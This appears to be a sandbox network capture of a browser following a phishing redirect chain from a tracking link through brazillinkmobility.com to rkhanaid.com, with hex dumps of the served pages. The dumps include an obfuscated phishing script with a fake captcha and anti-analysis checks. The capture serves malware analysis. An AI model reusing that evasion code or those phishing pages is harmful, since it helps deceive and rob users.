                          Data Ascii: ~k)2z_|~Gwp-qergMx3"\8vX-YRv?^_Q(%Bjp:}P[_0uBTg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm
                          Nov 25, 2024 17:55:49.494081020 CET1236INData Raw: 58 2c 9a 8f f3 8a 85 a1 e9 41 61 30 3b d9 1b bf a1 99 57 c0 35 96 59 d3 32 19 14 ae c5 80 4c 2a 8c 23 31 8e 23 06 59 f2 f0 d3 3a 38 d6 e1 50 bb de 46 46 b7 2c 79 13 c3 eb 75 2c de 42 97 c2 94 0d 7e ca ef ce d4 fc 46 da 3e 63 a3 84 03 87 6c 70 70
                          Data Ascii: X,Aa0;W5Y2L*#1#Y:8PFF,yu,B~F>clpp)Zv^U6A-63YZ2Zsc]1Z *[SiXCY^WQCbK~+n:)@UP7RpWO~b!/r@l-El
                          Nov 25, 2024 17:55:49.494101048 CET55INData Raw: f3 8a 9b 85 e6 c9 b3 81 95 de e4 76 e1 e9 b3 d1 c6 51 4e d1 b9 e6 ca 48 ed d6 b7 fe ec 9e d9 f5 30 98 c9 c5 d1 84 d2 26 3c 14 ae 64 4b ff 17 cc cb 70 7c 28 2e 00 00
                          Data Ascii: vQNH0&<dKp|(.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.4497383.160.188.1124434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:34 UTC1151OUTGET /ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D HTTP/1.1
                          Host: clickme.thryv.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:35 UTC440INHTTP/1.1 302 Found
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 68
                          Connection: close
                          Server: nginx
                          Date: Mon, 25 Nov 2024 16:55:35 GMT
                          X-Robots-Tag: noindex, nofollow
                          Location: http://brazillinkmobility.com/cgii/index.html
                          X-Cache: Miss from cloudfront
                          Via: 1.1 642ac9646ca474c1d78254f0a36a8c5e.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: MRS52-P5
                          X-Amz-Cf-Id: Jcvxq1E6B9ky4D64hUq26-dBKITsPJGyTeMDxxORb0Z5bUVD28hydQ==
                          2024-11-25 16:55:35 UTC68INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 61 7a 69 6c 6c 69 6e 6b 6d 6f 62 69 6c 69 74 79 2e 63 6f 6d 2f 63 67 69 69 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                          Data Ascii: <a href="http://brazillinkmobility.com/cgii/index.html">Found</a>.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.4497402.20.204.113443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:37 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-11-25 16:55:37 UTC478INHTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Server: Kestrel
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-eus-z1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          X-OSID: 2
                          X-CID: 2
                          X-CCC: GB
                          Cache-Control: public, max-age=59838
                          Date: Mon, 25 Nov 2024 16:55:37 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.4497432.20.204.113443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:39 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-11-25 16:55:40 UTC534INHTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                          Cache-Control: public, max-age=59864
                          Date: Mon, 25 Nov 2024 16:55:40 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-11-25 16:55:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449745104.21.55.2454434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:41 UTC714OUTGET /AKlVEiS64UXEo05M_nfcas4zNiMt/ HTTP/1.1
                          Host: 0fkw.rkhanaid.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: iframe
                          Referer: http://brazillinkmobility.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:42 UTC1226INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:55:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5J36v9Sg4%2B2WeNGxuFmGiwE8J9M09Y7Yw7OZSUYJO2d16euFW%2Bpqx0sPeH0P%2BagD4UEhwAJxLpqzMQzv03i5p2dbEMmhAQ5fKvADyi%2FJX8cw52mXebIuWhlKCO1WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2634&sent=27&recv=23&lost=0&retrans=0&sent_bytes=23732&recv_bytes=2639&delivery_rate=10400000&cwnd=255&unsent_bytes=0&cid=413209b41408ab38&ts=197651&x=0"
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IlJYRkhsejRWR2RPcitJeCsrN2dNUGc9PSIsInZhbHVlIjoiOUlKb3N1MCtLRkYxMEJqWEJ4dlAzQ3k0eFRkRDF1MGUxclRVaU13Z2FxSW4yS01hR2l3Ry8zcmYxQklWc09rOTYyb0R3aXkrRm9VbzZrZDhHK0JSelFRVWpzbDJQc0ZTSVhtaGJ4elNNN3J0SHhVVGp3RXY0b0JDdnA0OFU2OUQiLCJtYWMiOiJlZDcyMDg3ZDQwZDk1YmU3YTQwOTA1ZmEwODlkOTMwOTM1NzRkNjJjYTlhZDMxY2E2M2ZkZmRkMTdjZDk1YmIwIiwidGFnIjoiIn0%3D; expires=Mon, 25-Nov-2024 18:55:41 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-11-25 16:55:42 UTC708INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 39 5a 52 6e 64 35 65 57 46 50 54 57 51 72 4e 31 52 32 61 58 4e 6d 4c 7a 68 35 63 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 47 78 50 53 46 6c 4f 4e 58 4e 6d 4f 58 46 56 64 46 56 74 4d 6b 35 76 4e 6b 46 32 61 45 5a 6d 56 45 70 33 64 6d 6c 34 56 6a 42 68 65 45 64 72 52 6a 41 78 57 48 4a 43 4d 6b 4e 79 62 58 4a 43 53 31 52 45 4c 33 41 30 4d 47 39 6d 62 44 68 36 4c 7a 4a 6c 59 6a 46 6e 57 6d 35 70 52 48 68 50 52 32 31 54 65 55 78 73 4f 54 42 33 61 6d 64 61 53 6b 5a 44 61 48 4d 30 59 55 63 34 55 48 4a 78 55 30 68 61 57 6b 31 4f 52 44 6c 4d 63 30 4e 4c 64 58 4e 79 52 48 6c 4b 62 45 68 4b 65 6b 4a 31 55 6e 63 77 59 6b 52 57 65 55 34
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im9ZRnd5eWFPTWQrN1R2aXNmLzh5c3c9PSIsInZhbHVlIjoieGxPSFlONXNmOXFVdFVtMk5vNkF2aEZmVEp3dml4VjBheEdrRjAxWHJCMkNybXJCS1REL3A0MG9mbDh6LzJlYjFnWm5pRHhPR21TeUxsOTB3amdaSkZDaHM0YUc4UHJxU0haWk1ORDlMc0NLdXNyRHlKbEhKekJ1UncwYkRWeU4
                          2024-11-25 16:55:42 UTC1369INData Raw: 34 33 66 63 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 68 61 76 65 20 63 6c 69 6d 62 65 64 2c 20 62 75 74 20 68 6f 77 20 79 6f 75 20 6d 61 6b 65 20 61 20 70 6f 73 69 74 69 76 65 20 64 69 66 66 65 72 65 6e 63 65 20 74 6f 20 74 68 65 20 77 6f 72 6c 64 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 77 52 6d 74 33 4c 6e 4a 72 61 47 46 75 59 57 6c 6b 4c 6d 4e 76 62 53 39 42 53 32 78 57 52 57 6c 54 4e 6a 52 56 57 45 56 76 4d 44 56 4e 58 32 35 6d 59 32 46 7a 4e 48 70 4f 61 55 31 30 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74
                          Data Ascii: 43fc<script>/* Success is not how high you have climbed, but how you make a positive difference to the world. */if(atob("aHR0cHM6Ly8wRmt3LnJraGFuYWlkLmNvbS9BS2xWRWlTNjRVWEVvMDVNX25mY2FzNHpOaU10Lw==") == "nomatch"){document.write(decodeURIComponent
                          2024-11-25 16:55:42 UTC1369INData Raw: 4d 55 73 34 61 45 4a 6c 51 6c 59 34 5a 47 63 74 53 32 4e 50 63 48 51 33 65 54 68 32 63 6d 74 68 62 55 31 50 56 54 4a 49 65 46 63 77 55 31 52 77 4d 45 70 45 52 58 41 79 4d 55 5a 58 64 55 4e 58 65 45 52 59 57 6c 67 77 52 58 52 34 62 30 78 51 55 30 4a 58 55 6a 5a 58 64 32 68 59 57 6d 64 73 57 45 6c 32 56 31 68 69 61 44 49 30 62 32 70 31 65 57 39 6d 52 44 5a 6f 64 46 6b 34 52 44 51 76 63 7a 4d 7a 4f 54 59 76 64 58 4e 6c 63 6d 6c 75 64 47 56 79 4c 6e 42 75 5a 79 49 70 4f 77 30 4b 49 43 41 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 63 32 6c 36 5a 54 6f 67 59 32 39 32 5a 58 49 37 44 51 6f 67 49 43 41 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 5a 70 62 48 52
                          Data Ascii: MUs4aEJlQlY4ZGctS2NPcHQ3eTh2cmthbU1PVTJIeFcwU1RwMEpERXAyMUZXdUNXeERYWlgwRXR4b0xQU0JXUjZXd2hYWmdsWEl2V1hiaDI0b2p1eW9mRDZodFk4RDQvczMzOTYvdXNlcmludGVyLnBuZyIpOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOw0KICAgIGZpbHR
                          2024-11-25 16:55:42 UTC1369INData Raw: 32 6c 75 64 47 56 79 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 61 47 56 6a 61 32 31 68 63 6d 73 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 79 4d 48 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 6a 42 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 44 4a 77 65 43 42 7a 62 32 78 70 5a 43 41 6a 5a 44 4e 6b 4d 32 51 7a 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 79 59 57 52 70 64 58 4d 36 49 44 4e 77 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 79 61 57 64 6f 64 44 6f 67 4d 54 42 77 65 44 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70
                          Data Ascii: 2ludGVyOw0KfQ0KDQouY2FwdGNoYS1jaGVja21hcmsgew0KICAgIHdpZHRoOiAyMHB4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBib3JkZXI6IDJweCBzb2xpZCAjZDNkM2QzOw0KICAgIGJvcmRlci1yYWRpdXM6IDNweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgIG1hcmdpbi1yaWdodDogMTBweDsNCiAgICBwb3Np
                          2024-11-25 16:55:42 UTC1369INData Raw: 67 77 5a 47 56 6e 4b 54 73 67 66 51 30 4b 49 43 41 67 49 44 45 77 4d 43 55 67 65 79 42 30 63 6d 46 75 63 32 5a 76 63 6d 30 36 49 48 4a 76 64 47 46 30 5a 53 67 7a 4e 6a 42 6b 5a 57 63 70 4f 79 42 39 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 65 77 30 4b 49 43 41 67 49 47 52 70 63 33 42 73 59 58 6b 36 49 47 35 76 62 6d 55 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31 6b 61 58 4a 6c 59 33 52 70 62 32 34 36 49 47 4e 76 62 48 56 74 62 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 45 77 63 48 67 37 44
                          Data Ascii: gwZGVnKTsgfQ0KICAgIDEwMCUgeyB0cmFuc2Zvcm06IHJvdGF0ZSgzNjBkZWcpOyB9DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgew0KICAgIGRpc3BsYXk6IG5vbmU7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi10b3A6IDEwcHg7D
                          2024-11-25 16:55:42 UTC1369INData Raw: 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57
                          Data Ascii: kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW
                          2024-11-25 16:55:42 UTC1369INData Raw: 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 6e 30 70 4f 77 30 4b 4b 47 5a 31 62 6d 4e 30 61 57 39 75 49 47 56 51 61 31 4e 31 52 57 78 79 54 55 73 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 62 47 56 30 49 45 74 34 52 57 68 58 54 55 5a 33 65 57 6f 67 50 53 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 43 53 30 4a 59 56 31 4a 75 63 6d 78 76 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 33 51 30 31 6e 53 6d 68 36 54 55 35 4f 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52
                          Data Ascii: IHJldHVybiBmYWxzZTsNCn0pOw0KKGZ1bmN0aW9uIGVQa1N1RWxyTUsoKSB7DQogICAgbGV0IEt4RWhXTUZ3eWogPSBmYWxzZTsNCiAgICBjb25zdCBCS0JYV1JucmxvID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCB3Q01nSmh6TU5OID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGR
                          2024-11-25 16:55:42 UTC1369INData Raw: 6d 46 7a 5a 54 59 30 4c 47 6c 57 51 6b 39 53 64 7a 42 4c 52 32 64 76 51 55 46 42 51 55 35 54 56 57 68 46 56 57 64 42 51 55 46 6d 55 55 46 42 51 55 6c 42 51 30 46 4e 51 55 46 42 51 6b 51 30 4d 6a 52 78 51 55 46 42 51 55 4a 48 5a 45 4a 55 56 55 56 42 51 55 78 48 55 45 4d 76 65 47 68 43 55 55 46 42 51 55 46 47 65 6c 56 72 5a 45 4e 42 53 7a 64 50 53 45 39 72 51 55 46 42 54 55 46 56 52 58 68 56 55 6c 56 6b 64 31 52 50 62 45 4a 4e 4b 33 52 43 54 53 74 34 51 6b 35 74 65 55 39 6b 64 6a 6c 77 54 57 70 44 62 6c 64 46 53 30 59 34 4d 45 39 48 4f 55 51 72 51 53 38 76 51 6b 46 4f 64 58 52 44 54 6b 39 77 51 30 35 50 56 6b 52 4e 61 6b 39 76 56 57 70 48 63 6c 5a 45 54 32 35 56 64 57 68 42 54 6b 52 50 62 6c 56 71 54 32 31 56 64 57 68 45 54 6d 5a 70 4e 30 4a 55 53 32 35 56
                          Data Ascii: mFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFmUUFBQUlBQ0FNQUFBQkQ0MjRxQUFBQUJHZEJUVUVBQUxHUEMveGhCUUFBQUFGelVrZENBSzdPSE9rQUFBTUFVRXhVUlVkd1RPbEJNK3RCTSt4Qk5teU9kdjlwTWpDbldFS0Y4ME9HOUQrQS8vQkFOdXRDTk9wQ05PVkRNak9vVWpHclZET25VdWhBTkRPblVqT21VdWhETmZpN0JUS25V
                          2024-11-25 16:55:42 UTC1369INData Raw: 4e 71 64 56 5a 78 62 48 6c 7a 55 58 6f 72 54 44 4a 6d 62 58 68 44 5a 6d 56 6b 52 57 52 68 4e 45 55 79 59 58 52 51 4d 33 56 32 54 69 39 47 64 45 70 4b 61 58 6c 4d 54 45 4d 78 53 58 46 54 65 6b 6f 79 4b 33 56 50 65 6e 46 5a 62 31 42 47 65 55 6c 73 54 33 4a 53 4f 47 45 7a 52 33 5a 58 54 30 59 34 4e 6a 52 47 4d 46 64 78 56 45 6c 68 64 30 31 32 55 30 56 48 4e 44 5a 35 54 43 39 58 53 6b 64 6a 53 6e 6c 75 59 56 56 42 51 55 46 45 52 32 52 47 53 6b 39 56 64 30 52 33 4b 30 45 77 51 6b 46 6e 57 6c 6c 54 51 57 64 52 4d 47 30 30 53 32 64 42 65 57 6f 76 59 6a 4d 77 4c 33 59 33 55 33 6c 50 4e 6c 64 43 4c 31 52 4b 51 58 70 78 55 55 70 61 56 58 59 30 4d 7a 6c 52 63 31 42 75 4e 31 6c 55 64 6a 68 59 61 44 5a 32 55 6b 30 33 5a 6a 4a 79 4e 47 59 32 56 57 39 58 63 53 74 56 63
                          Data Ascii: NqdVZxbHlzUXorTDJmbXhDZmVkRWRhNEUyYXRQM3V2Ti9GdEpKaXlMTEMxSXFTekoyK3VPenFZb1BGeUlsT3JSOGEzR3ZXT0Y4NjRGMFdxVElhd012U0VHNDZ5TC9XSkdjSnluYVVBQUFER2RGSk9Vd0R3K0EwQkFnWllTQWdRMG00S2dBeWovYjMwL3Y3U3lPNldCL1RKQXpxUUpaVXY0MzlRc1BuN1lUdjhYaDZ2Uk03ZjJyNGY2VW9XcStVc
                          2024-11-25 16:55:42 UTC1369INData Raw: 35 61 47 6f 7a 53 6c 4a 4f 52 6d 5a 57 4e 56 42 31 62 32 31 47 61 6b 68 48 55 46 45 76 64 6b 74 44 5a 6d 4e 68 64 30 39 52 4e 7a 67 79 63 6d 59 35 65 58 52 50 52 30 4a 71 61 57 6c 68 53 31 68 6b 57 6b 74 57 62 32 46 46 54 45 64 48 4e 46 52 31 5a 47 46 77 65 46 46 35 55 44 5a 72 63 57 70 50 63 33 41 31 55 6d 34 32 52 56 68 75 63 6e 70 74 65 58 52 7a 63 56 52 72 54 53 39 70 62 45 31 68 53 7a 4e 6a 57 45 31 76 59 56 64 4b 54 55 78 68 59 6e 4e 57 61 30 70 33 65 48 52 6a 55 6c 4d 77 4c 30 78 53 57 45 70 33 4d 6e 52 54 5a 57 35 59 55 6d 52 73 55 6c 4e 53 61 57 45 30 65 44 6c 6b 4d 45 31 30 4e 55 78 48 53 30 46 30 57 47 55 34 55 6e 45 7a 65 53 74 35 59 32 67 76 51 32 74 36 64 57 70 53 57 6b 4a 4c 54 6b 38 79 54 6a 56 6a 65 44 51 35 63 46 56 68 54 45 78 73 4e 6b
                          Data Ascii: 5aGozSlJORmZWNVB1b21GakhHUFEvdktDZmNhd09RNzgycmY5eXRPR0JqaWlhS1hkWktWb2FFTEdHNFR1ZGFweFF5UDZrcWpPc3A1Um42RVhucnpteXRzcVRrTS9pbE1hSzNjWE1vYVdKTUxhYnNWa0p3eHRjUlMwL0xSWEp3MnRTZW5YUmRsUlNSaWE0eDlkME10NUxHS0F0WGU4UnEzeSt5Y2gvQ2t6dWpSWkJLTk8yTjVjeDQ5cFVhTExsNk


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449746151.101.2.1374434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:44 UTC535OUTGET /jquery-3.6.0.min.js HTTP/1.1
                          Host: code.jquery.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://0fkw.rkhanaid.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:44 UTC613INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 89501
                          Server: nginx
                          Content-Type: application/javascript; charset=utf-8
                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                          ETag: "28feccc0-15d9d"
                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          Via: 1.1 varnish, 1.1 varnish
                          Accept-Ranges: bytes
                          Date: Mon, 25 Nov 2024 16:55:44 GMT
                          Age: 2535819
                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740031-EWR
                          X-Cache: HIT, HIT
                          X-Cache-Hits: 5889, 9
                          X-Timer: S1732553744.403764,VS0,VE0
                          Vary: Accept-Encoding
                          2024-11-25 16:55:44 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
